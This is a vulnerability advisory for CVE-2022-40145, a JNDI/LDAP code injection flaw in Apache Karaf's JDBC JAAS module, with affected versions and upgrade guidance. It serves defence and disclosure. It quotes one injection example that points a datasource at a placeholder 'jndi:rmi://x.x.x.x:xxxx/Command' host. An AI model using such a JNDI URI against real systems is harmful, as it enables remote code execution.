CVE-2022-40145 Apache Karaf: JDBC JAAS LDAP injection

Critical 9.8 Published Updated

Attackers can achieve remote code execution in Apache Karaf by controlling the target LDAP server when a JNDI LDAP data source URI is configured.

Exploited in the wild
Not known
Login needed
Not needed
Attackable
Over the internet
Victim action needed
Not needed
Fix
Available

What is CVE-2022-40145?

CVE-2022-40145 is a critical code injection vulnerability in Apache Karaf, published on 21 Dec 2022. An attacker can exploit it over the internet without logging in, with no action from the victim.

Official description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

Weakness: CWE-74, CWE-20

Which versions are affected by CVE-2022-40145?

4 open source packages ship an affected version, including org.apache.karaf:apache-karaf. It affects 1 product.

PackageAffectedFixed in
org.apache.karaf:apache-karaf MavenAll versions4.3.8
org.apache.karaf:apache-karaf MavenAll versions4.3.8
org.apache.karaf:apache-karaf MavenFrom 4.4.04.4.2
org.apache.karaf:apache-karaf MavenFrom 4.4.04.4.2

Products include Apache Karaf.

How do I fix CVE-2022-40145?

Upgrade org.apache.karaf:apache-karaf to a fixed version for your release line: 4.3.8 or 4.4.2.

Upgrade, and never evaluate templates, expressions or code built from user input. More about Code injection.

Is CVE-2022-40145 being exploited?

There is no known exploitation of CVE-2022-40145 in the wild and no public exploit code.

Sources

Also known as GHSA-c2p4-8mvv-rwmv.

Is CVE-2022-40145 in your software?

Upload an SBOM and sbomify checks it against every vulnerability here, every day.

Check your SBOMs for free